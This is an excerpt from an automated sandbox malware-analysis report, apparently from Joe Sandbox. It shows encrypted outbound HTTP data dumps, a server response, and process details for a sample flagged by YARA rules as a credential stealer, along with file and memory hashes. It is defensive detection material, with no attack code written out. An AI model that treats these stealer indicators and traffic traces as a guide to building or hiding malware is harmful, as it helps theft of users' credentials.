                                                                                                                  2024-12-23 13:28:16 UTC15331OUTData Raw: c9 fc 28 5e 25 e0 81 c5 ae 1f d3 b0 54 c1 3b e5 98 60 c1 53 28 1c 71 80 6b 78 70 10 e7 51 a2 f2 62 96 fd d0 e4 23 0f ec 3c f9 f6 cd eb 3f 74 dd 2c e7 87 d0 23 9d 17 e7 00 f1 0a 44 54 18 ca 47 01 d7 b6 82 27 4f e0 52 50 af ff df a9 b5 36 17 ac d5 db f7 eb 0d da 76 e1 fa f5 58 e4 9d d9 6a 5f 5e b3 e2 53 6e d5 5e 18 2f de 15 f9 85 e2 2c 51 3f 4b af 86 80 44 1c e4 36 b9 77 dd 8a 27 40 1e 38 7f 9f 23 45 d4 e0 86 e2 4a 51 bb f2 76 e9 61 bf 4b 08 bc 46 d3 3b 05 c8 ba 2c f5 15 21 8b 5a 52 aa 28 4e 04 bc 11 55 b7 04 99 0d 21 ae 80 30 54 30 37 2c 27 36 52 ad f5 8c a1 2f a4 fe 4f c4 8b 43 a4 16 80 59 44 b3 e3 f4 50 3b c1 c1 c5 9f ee e9 e8 f5 03 fb 77 6f c4 fd 4e a8 21 f3 73 2e 11 0a 9a 96 b2 7d 39 1e 4e ba 58 c2 a6 80 52 43 3c 4e c8 ea ab 99 18 ea 1d 12 47 13 2c 5a
                                                                                                                  Data Ascii: (^%T;`S(qkxpQb#<?t,#DTG'ORP6vXj_^Sn^/,Q?KD6w'@8#EJQvaKF;,!ZR(NU!0T07,'6R/OCYDP;woN!s.}9NXRC<NG,Z
                                                                                                                  2024-12-23 13:28:16 UTC15331OUTData Raw: 0e 81 67 af 04 66 f5 b9 15 81 40 68 23 b4 90 e1 0f 83 fa a1 91 91 81 70 98 df ba 46 2f 3f c3 a2 a9 31 90 6e 4e fb 7d 82 6c 7a f4 78 78 46 84 76 05 57 c5 1b a1 b0 fa 56 c9 9a 6c 15 70 66 52 1e 22 ba f1 2d 0f 20 f1 88 40 e9 5b be 26 fe 1a 86 6d 91 9a 6b 95 3e 37 49 13 cd 07 24 85 27 9c 8c f5 b9 53 98 33 93 17 f7 af e7 0e a9 63 86 03 1f 0d 0e 07 1f 5b 50 ee 2e 62 b4 6a 8b d9 69 4b 35 2f 04 33 ae 1d 27 8b ad bf d6 b4 1d 96 6f 5d 94 b4 af 0f d3 10 6d 2b e7 84 71 53 04 05 46 82 30 20 18 03 63 6c 83 fe 5d 02 f4 91 05 23 31 60 1b 4d ab 3a 57 ec 14 83 09 47 a4 5b 84 e8 7b d9 35 53 3f 09 8d 4b 15 bc ce 79 1b 8f b6 3f 2f c0 5c 15 3e 68 17 aa ea b7 65 14 eb 98 8b f7 ff 56 51 fc 7f 5f 10 9c 8d 84 47 02 b8 44 45 c6 36 04 1f 53 65 9c ed 0f 95 fd 8f 14 cd 53 01 d1 a1 e2
                                                                                                                  Data Ascii: gf@h#pF/?1nN}lzxxFvWVlpfR"- @[&mk>7I$'S3c[P.bjiK5/3'o]m+qSF0 cl]#1`M:WG[{5S?Ky?/\>heVQ_GDE6SeS
                                                                                                                  2024-12-23 13:28:16 UTC15331OUTData Raw: 90 f0 8c e4 c7 57 e2 7d 91 54 03 04 d6 48 c5 af 5b 86 cc af 2e eb 16 8c 21 25 10 a1 da cf 27 40 0c f7 74 41 26 e9 3c 8c 7c be 0b 07 bb 3c aa 07 cc 54 7c 64 79 bb c9 41 d2 39 c0 7e 3f 5b 9c b5 04 52 db 28 15 6b 81 b3 e0 34 98 72 57 14 03 9a 57 4c a9 3b 60 63 50 2b b3 72 e0 81 f2 dd cd 01 5d 0c 11 55 a1 26 e3 9e d7 8b 30 d9 94 31 d6 ad b2 b3 40 fe 0f 0a 98 93 36 ad 69 23 05 ed bb 8e f0 a0 cd 41 09 95 10 6d c2 d0 1c 07 0c e3 e1 16 24 b0 7c 04 77 89 82 dd 65 cb c2 f4 76 e3 5e 71 50 b6 79 7b 6f 00 0a 68 b0 9f 68 22 2a 0b b5 8a 08 d1 73 3a 25 19 50 df c1 f1 62 55 70 9a e1 fe 61 63 fd b0 e3 e0 46 d3 87 94 c3 e3 ec 47 95 29 2a ca d4 2c 83 3f 0a 7d 47 87 c2 7a 44 5b 0f a4 d7 87 51 a8 75 b8 4c db 1f 53 5a 6d 53 2c 1b de 3d b8 6e 2b 4a e8 a1 72 76 d6 83 28 7b 90 af
                                                                                                                  Data Ascii: W}TH[.!%'@tA&<|<T|dyA9~?[R(k4rWWL;`cP+r]U&01@6i#Am$|wev^qPy{ohh"*s:%PbUpacFG)*,?}GzD[QuLSZmS,=n+Jrv({
                                                                                                                  2024-12-23 13:28:16 UTC15331OUTData Raw: da b0 4d 11 dc 41 49 70 68 ee 21 20 dd 9c 9a b6 7b fa d6 e5 ba e3 8a 32 e5 8d ba 1a a0 9b 27 08 bf f3 18 3d 8d a6 bf dd 18 b5 cc ed ef 1d e3 ff 6e 0b 7d 51 27 5c e7 0c 91 19 59 01 fc f7 cc 0d fb 91 a4 45 7e be 8f 30 7d de 3a 7c 4f c1 10 f7 2f 1c ef b8 2e 60 c7 28 23 7e 42 7c aa 57 90 6d 0b d8 df 65 89 40 a3 23 77 0f 89 9f 71 98 2b cd ea 52 43 d5 50 5a a0 3e 79 70 e8 23 2e e9 a0 97 a1 76 8f 62 9f 63 d9 8e d0 33 b2 a4 be 09 5c 7a 9d 6e e7 57 ce 50 f9 c1 48 a4 e5 18 a6 ea 01 e9 39 eb a7 d5 95 06 d2 34 2e 7f bb c6 f0 08 92 49 a2 b0 c2 3d 10 da 4d 54 08 45 44 81 13 83 62 b7 ee 5a 8c 1f 15 39 24 7e 74 f5 d9 7c 43 a8 02 c9 ab 49 bb c4 84 c2 0b 0d 5d be 7b f6 b3 2f 63 66 93 b7 96 a0 30 0a 97 41 fe 61 72 86 b3 fb 6e b0 75 73 42 6b 21 be ed e2 7e 14 6c 4b 04 f2 9b
                                                                                                                  Data Ascii: MAIph! {2'=n}Q'\YE~0}:|O/.`(#~B|Wme@#wq+RCPZ>yp#.vbc3\znWPH94.I=MTEDbZ9$~t|CI]{/cf0AarnusBk!~lK
                                                                                                                  2024-12-23 13:28:16 UTC15331OUTData Raw: a5 e3 e5 e5 06 5e 71 00 1f bc a0 5d 1f 2e ed e8 c7 99 ca b8 0c 08 fd 7e c1 e9 6e c6 9f 75 db eb da 8d 8a d7 33 54 b8 32 e7 48 fa 5b f6 96 8b 5a 57 69 dc e0 0f c1 a2 5b ad 5c be 73 6c ed 98 39 24 25 b3 52 65 d3 9e 9d 3e 69 eb 7d 15 e8 d3 d2 8f 66 b4 86 e6 d3 d4 b9 09 c1 bb d2 a7 6c e0 38 f8 6f 4a ff b7 9e c1 9b 86 80 50 00 f5 e0 25 8d 6d 38 c2 c1 ce df d6 c6 3f d0 b3 83 36 5e 17 04 6d 8d 9d e4 54 31 0f ee 20 1f cb ef 62 73 7a 8d 05 62 94 32 07 df cb 01 ad 23 b4 eb 9f d3 72 15 5b 6e 07 68 3f 0e ff 7c c7 f8 96 16 98 2e 89 6a 40 54 7a 9f 38 12 84 89 b2 16 00 b7 50 68 de a5 53 ce 84 49 d1 61 57 29 99 5d 75 f9 5e dd 52 7f 93 3c a5 c6 04 4d ca 30 90 70 bd 01 d8 31 ee 4d fd 0e 90 27 1c 61 2f 0a a8 f9 72 ef 5a 57 95 bd 95 e3 75 5b b1 1b 2b 6b 57 f3 4f d7 2f ec 11
                                                                                                                  Data Ascii: ^q].~nu3T2H[ZWi[\sl9$%Re>i}fl8oJP%m8?6^mT1 bszb2#r[nh?|.j@Tz8PhSIaW)]u^R<M0p1M'a/rZWu[+kWO/
                                                                                                                  2024-12-23 13:28:16 UTC15331OUTData Raw: 07 b9 63 be a0 5e 9d d1 b7 10 b3 1e 06 d3 e0 d0 0b 8b e1 2a 7d f0 61 d9 96 09 2a 15 3b eb 4f 43 85 e1 20 49 d4 f9 d5 4a 9d 23 61 32 5b a3 81 65 03 dc 1a dd 91 44 42 47 1b e2 52 6f a1 1f df 45 21 90 d4 66 d2 78 7b dd d8 a9 29 30 55 66 4f 31 ca ec 9e 85 f0 86 c4 ea 5e e9 77 05 44 2f 51 61 2d ab be b0 a8 b0 49 dc 3b f3 36 cc 11 37 ad 2b 98 f3 50 ec e2 15 97 08 63 5e 95 7e 37 4b 2f d3 d1 5c 82 3f b7 1f 46 78 4c 27 c7 33 ba eb 37 6b f7 4e f0 1c bb 62 2a 8c 0a a5 ae cf 0c d1 77 c3 4a b3 bc 3a a5 d8 b2 f4 69 37 ed 0c 80 a3 c2 cc d6 bc e1 eb 7a 13 d9 01 f1 9b 56 ba ed d9 0c 29 ce 55 03 ea b5 36 42 57 0f db e3 28 56 57 e1 b2 aa 1e b8 a4 5d 98 36 98 ac 3a ce d4 1f 5f 3f 13 15 1a 20 32 20 94 ac f4 63 e6 a4 89 69 4d a7 c1 4a d8 7f 9b 1a 9e 21 18 a7 09 ff c7 7d ce da
                                                                                                                  Data Ascii: c^*}a*;OC IJ#a2[eDBGRoE!fx{)0UfO1^wD/Qa-I;67+Pc^~7K/\?FxL'37kNb*wJ:i7zV)U6BW(VW]6:_? 2 ciMJ!}
                                                                                                                  2024-12-23 13:28:16 UTC15331OUTData Raw: 67 c2 1a e0 e4 ba 9d 3a ff 67 80 e3 6a 25 2c 11 57 c8 0b 74 d6 6e 7b dd ba eb 7c 94 fa 03 89 f6 ab bd f5 2e 49 0e fc 96 3b a5 8b 7b 5e 27 0e e1 b8 2a 01 55 d2 37 3f aa 24 bc c5 10 6d 6b 50 d8 41 e5 dd e8 63 7b 8d 60 47 48 b6 0a 1c ae bf 9e 16 e6 a6 d2 b8 db 84 f7 f4 e8 bb 4e 7c 5e d4 50 cc fc 55 b3 b4 0e f1 5b 44 a1 cf 0e d4 ae e4 d0 81 3b 72 1b f6 d7 d6 3e 8a e0 b9 2f e8 a2 34 8c e1 21 41 25 c5 04 cb 6c c1 d7 47 b5 3e 45 bf d9 64 1f 29 f6 80 b2 9d bc d4 a5 bd a8 14 17 ec dc 78 b1 f0 5d e7 e6 48 5e 16 86 e3 66 26 3d 8d 81 70 73 ae cd d8 f1 b5 b7 35 d1 47 b0 fa ad dc 4e 27 03 c5 b5 da 38 52 15 1f 3e 31 58 43 af 4d 6c 8e 46 18 36 f9 9b 45 f0 ae ae c8 c7 44 f6 c8 e7 85 35 b1 fc cb b3 4c 8d d1 80 bc 4e 35 e7 13 32 19 ec b5 fd 36 68 ce 85 2b 44 6f 6c d9 49 17
                                                                                                                  Data Ascii: g:gj%,Wtn{|.I;{^'*U7?$mkPAc{`GHN|^PU[D;r>/4!A%lG>Ed)x]H^f&=ps5GN'8R>1XCMlF6ED5LN526h+DolI
                                                                                                                  2024-12-23 13:28:19 UTC1141INHTTP/1.1 200 OK
                                                                                                                  Date: Mon, 23 Dec 2024 13:28:19 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Set-Cookie: PHPSESSID=c9ctn18ldmuclho5svk1r17ku7; expires=Fri, 18 Apr 2025 07:14:57 GMT; Max-Age=9999999; path=/
                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                  Pragma: no-cache
                                                                                                                  X-Frame-Options: DENY
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  vary: accept-encoding
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pOrGDJTtd%2BHm4aooB0ijMgCjmELde3GM8KmCU4ulDejqm28CUaSxqmZrHmeBjvud090eljxlMUtA460lZ0%2BetNaGiHes%2BKyYmLnTS8Km%2BTRTfHpeL7OgiN%2Bu1mdgndfjQcFG%2BRo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8f68b1a18e3441ac-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1587&min_rtt=1585&rtt_var=599&sent=322&recv=593&lost=0&retrans=0&sent_bytes=2846&recv_bytes=575206&delivery_rate=1819314&cwnd=252&unsent_bytes=0&cid=4b723f11235ea233&ts=2681&x=0"


                                                                                                                  Click to jump to process

                                                                                                                  Click to jump to process

                                                                                                                  Click to dive into process behavior distribution

                                                                                                                  Target ID:0
                                                                                                                  Start time:08:27:58
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Users\user\Desktop\file.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                  Imagebase:0xa30000
                                                                                                                  File size:5'784'576 bytes
                                                                                                                  MD5 hash:D41882715738E10A16D164DA8514AA5A
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1810057731.0000000001A95000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1831258871.0000000001A43000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1804616185.0000000001A93000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1804616185.0000000001A43000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1809947662.0000000001A43000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1809947662.0000000001A93000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1810197735.0000000001A47000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1831453164.0000000001A47000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  Reset < >
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000003.1874634736.0000000001A2B000.00000004.00000020.00020000.00000000.sdmp, Offset: 01A2D000, based on PE: false
                                                                                                                    • Associated: 00000000.00000003.1831258871.0000000001A2F000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_3_1a2d000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a7a477c8a8a72dc8e577ec25f915f61fc23492259ea5cdb348dc172d33c1c99a
                                                                                                                    • Instruction ID: 435d4fac092e8f8972332278faef89abf78a095b606be9843e070c3f6aab1f9b
                                                                                                                    • Opcode Fuzzy Hash: a7a477c8a8a72dc8e577ec25f915f61fc23492259ea5cdb348dc172d33c1c99a
                                                                                                                    • Instruction Fuzzy Hash: E403D7B2CD93469FC786EFA9C855654BBF1FB5237030580EEE0108B225E7BE5882DB51